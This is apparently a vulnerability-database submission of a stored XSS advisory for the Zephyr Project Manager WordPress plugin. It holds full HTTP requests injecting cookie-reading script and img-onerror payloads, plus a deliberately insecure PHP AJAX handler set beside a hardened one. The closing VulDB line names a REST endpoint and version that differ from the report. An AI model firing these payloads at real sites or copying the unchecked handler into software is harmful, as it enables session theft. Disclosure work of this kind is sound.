Submission #45806: Zephyr Project Manager 3.2.42 - Unauthorised AJAX Calls To Stored XSS

Title: Zephyr Project Manager 3.2.42 - Unauthorised AJAX Calls To Stored XSS

Description:

Zephyr Project Manager is a plug-in that helps you manage all your projects and tasks and get things done effectively.

> It has been determined that in most places throughout the application, the data from the input field can be injected as HTML without any sanitization or validation. The details of the discovery are given below.

## Proof of Concept (PoC)

The details of the various (Reflected and Stored) XSS issues in the application are given below.

### Endpoint of new discussion for a task (Stored XSS)

Steps to reproduce:

1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_tasks&action=view_task&task_id=1
2. Click on the Discussion tab.
3. Enter the payload in the comment field.
4. Click on "Comment".

Sample request:

```http
POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_tasks&action=view_task&task_id=1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 108
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

user_id=1&subject=task&subject_id=213&message=%3cscript%3ealert(document.cookie)%3c%2fscript%3e&type=message&action=zpm_send_comment&zpm_nonce=22858bf3a7
```

Payload: `%3cscript%3ealert(document.cookie)%3c%2fscript%3e`

Parameter(s): `message`

### Endpoint of new team and team update (Stored XSS)

Steps to reproduce:

1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members
2. Click on "New Team" or "Edit Team".
3. Enter the payload in the team name and team description fields.
4. Click on "Create Team".

Sample request:

```http
POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&description=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&action=zpm_add_team
```

Payload: `%3cscript%3ealert(document.cookie)%3c%2fscript%3e`

Parameter(s): `name`, `description`

### Endpoint of user access (Stored XSS)

Steps to reproduce:

1. Go to https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members
2. Click on "Bulk Edit Access".
3. Choose any options.
4. Click on "Allow Access".
5. Intercept the request in a proxy and replace the value of the `access` parameter with the payload.
6. Forward the modified request.

Sample request:

```http
POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_teams_members
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1103
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

user_id%5B0%5D%5Bid%5D=1&user_id%5B0%5D%5Bemail%5D=dev-email%40flywheel.local&user_id%5B0%5D%5Bname%5D=admin&user_id%5B0%5D%5Bdescription%5D=&user_id%5B0%5D%5Bavatar%5D=https%3A%2F%2Fsecure.gravatar.com%2Favatar%2Fc2b06ae950033b392998ada50767b50e%3Fs%3D96%26d%3Dmm%26r%3Dg&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_activity%5D=0&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_tasks%5D=1&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_updates%5D=0&user_id%5B0%5D%5Bpreferences%5D%5Bnotify_task_assigned%5D=1&user_id%5B0%5D%5Bcan_zephyr%5D=true&user_id%5B1%5D%5Bid%5D=1&user_id%5B1%5D%5Bemail%5D=dev-email%40flywheel.local&user_id%5B1%5D%5Bname%5D=admin&user_id%5B1%5D%5Bdescription%5D=&user_id%5B1%5D%5Bavatar%5D=https%3A%2F%2Fsecure.gravatar.com%2Favatar%2Fc2b06ae950033b392998ada50767b50e%3Fs%3D96%26d%3Dmm%26r%3Dg&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_activity%5D=0&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_tasks%5D=1&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_updates%5D=0&user_id%5B1%5D%5Bpreferences%5D%5Bnotify_task_assigned%5D=1&user_id%5B1%5D%5Bcan_zephyr%5D=true&access=trueo6c2i%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3eb6lt4&action=zpm_update_user_access
```

Payload: `%3cscript%3ealert(document.cookie)%3c%2fscript%3e`; the captured request above instead carries an `<img src=a onerror=alert(document.cookie)>` variant, wrapped between the marker strings `trueo6c2i` and `b6lt4`.

Parameter(s): `access`

Of the three captured requests, only the `zpm_send_comment` call carries a `zpm_nonce` value; the `zpm_add_team` and `zpm_update_user_access` request bodies contain no nonce parameter at all.
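The handler pattern that the requests above imply, a WordPress `admin-ajax.php` action that stores a POST field unchecked and later echoes it into an admin page, shown next to a hardened version with a nonce check, a capability check, input sanitization and output escaping. This is an added illustration written for this page, not Zephyr Project Manager's own code: the hook names, the option keys, the nonce action string `zpm_demo_ajax` and the `manage_options` capability are assumptions chosen to make the comparison concrete.

```php
<?php
// Added illustration for this page, not Zephyr Project Manager's code.
// Both handlers are hypothetical; the names only mirror the AJAX actions
// seen in the report (zpm_add_team) to keep the comparison readable.

// --- Vulnerable pattern: what the captured requests imply ---------------
// No nonce, no capability check, and the raw POST values are stored as-is.
add_action('wp_ajax_zpm_add_team_vuln', function () {
    $teams   = get_option('zpm_teams_demo', array());
    $teams[] = array(
        'name'        => $_POST['name'],         // raw attacker input
        'description' => $_POST['description'],  // raw attacker input
    );
    update_option('zpm_teams_demo', $teams);
    wp_send_json_success();
});

// The stored values are later rendered without escaping, so a stored
// <script> or <img onerror=...> payload runs for every admin who views it.
function zpm_demo_render_teams_vuln() {
    foreach (get_option('zpm_teams_demo', array()) as $team) {
        echo '<h3>' . $team['name'] . '</h3>';
        echo '<p>' . $team['description'] . '</p>';
    }
}

// --- Hardened pattern ---------------------------------------------------
// 1. Issue a per-user nonce to the page's JavaScript (for example via
//    wp_localize_script). The action string is an assumption; any fixed
//    string works as long as the check below uses the same one.
function zpm_demo_nonce_for_script() {
    return wp_create_nonce('zpm_demo_ajax');
}

add_action('wp_ajax_zpm_add_team_safe', function () {
    // 2. Refuse requests without a valid nonce in the 'zpm_nonce' field.
    //    check_ajax_referer() terminates the request on failure.
    check_ajax_referer('zpm_demo_ajax', 'zpm_nonce');

    // 3. Require an explicit capability instead of "any logged-in user".
    //    'manage_options' is an assumption; a real plugin would map this to
    //    its own role model.
    if (! current_user_can('manage_options')) {
        wp_send_json_error(array('message' => 'forbidden'), 403);
    }

    // 4. Sanitize on input: plain text for the name, a limited HTML subset
    //    for the description. wp_kses_post() drops <script>, on* event
    //    handlers and javascript: URLs while keeping ordinary formatting.
    $name        = sanitize_text_field(wp_unslash($_POST['name'] ?? ''));
    $description = wp_kses_post(wp_unslash($_POST['description'] ?? ''));
    if ($name === '') {
        wp_send_json_error(array('message' => 'name required'), 400);
    }

    $teams   = get_option('zpm_teams_demo_safe', array());
    $teams[] = array('name' => $name, 'description' => $description);
    update_option('zpm_teams_demo_safe', $teams);
    wp_send_json_success(array('count' => count($teams)));
});

// 5. Escape on output too: escaping belongs to the context where the value
//    is emitted, and rows stored before the input filter existed must not
//    be trusted.
function zpm_demo_render_teams_safe() {
    foreach (get_option('zpm_teams_demo_safe', array()) as $team) {
        echo '<h3>' . esc_html($team['name']) . '</h3>';
        echo '<p>' . wp_kses_post($team['description']) . '</p>';
    }
}
```

Sending the report's `zpm_add_team` body to the `_vuln` handler stores `<script>alert(document.cookie)</script>` verbatim; sending it to the `_safe` handler without a valid `zpm_nonce` is rejected before the body is read, and with a valid nonce the name is reduced to the text `alert(document.cookie)` and the description loses its `<script>` element. The `<img src=a onerror=...>` variant from the `zpm_update_user_access` request is handled the same way: `wp_kses_post()` keeps the `<img>` tag but strips the `onerror` attribute.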
Source: https://wpscan.com/vulnerability/bfd8a7aa-5977-4fe5-b2fc-12bf93caf3ed
User: r1z4x (UID 31999)
Submission: 13/09/2022 14:39 (4 years ago)
Moderated: 23/09/2022 08:58 (10 days later)
Status: Accepted
VulDB entry: 209370 [Zephyr Project Manager up to 3.2.4 on WordPress REST Call /v1/tasks/create/ onanimationstart cross site scripting]
Points: 20
